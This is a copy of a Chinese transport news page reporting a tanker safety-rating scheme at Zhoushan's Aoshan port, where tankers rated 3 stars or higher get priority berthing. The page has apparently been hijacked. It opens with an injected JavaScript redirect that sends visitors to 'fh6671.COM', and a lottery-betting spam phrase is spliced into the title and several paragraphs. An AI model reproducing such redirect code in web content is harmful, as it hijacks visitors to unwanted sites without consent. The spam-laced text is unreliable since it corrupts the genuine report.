function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

3星以上油轮优先靠泊舟山岙山港区

2020-11-18 11:33:25 来源:中国交通新闻网 作者:金丛岚

三分彩计划 日前,全国首个“海企联动到港油轮安全质量控制机制”在浙江舟山岙山港区建立。该机制由舟山海事局联合中化能源物流有限公司共同发起,标志着海事部门与大型油储企业在共筑油轮到港作业安全防线的进程中又迈进了一大步。

“海企联动到港油轮安全质量控制机制”是舟山海事局提出“畅油碧海”系列监管经验的具体行动之一。该机制通过主管部门、码头和航运企业三方协作构建安全生产共同体,运用系统大数据分析模型对油轮整体质量水平进行客观公正评价,从船舶自身状况、海事监管信息、船岸作业界面不安全要素、行业自律组织检查4个维度,对靠港油轮进行赋分。

三分彩计划该机制依托自主开发的到港油轮安全质量信息化平台,按照风险等级把靠港油轮划分1星到5星,对3星及以上的船舶给予优先靠泊、减少日常检查等方面的政策优惠,对于低星级船舶则给予增加检查频次等多种限制,不断压缩低标准企业和船舶生存空间,提高到港油轮整体质量水平。

三分彩计划目前,岙山油库罐容已扩展至1223万立方米,成为全世界最大的单体石油基地,船用燃料油直供量占浙江自贸区总量的80%。 

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。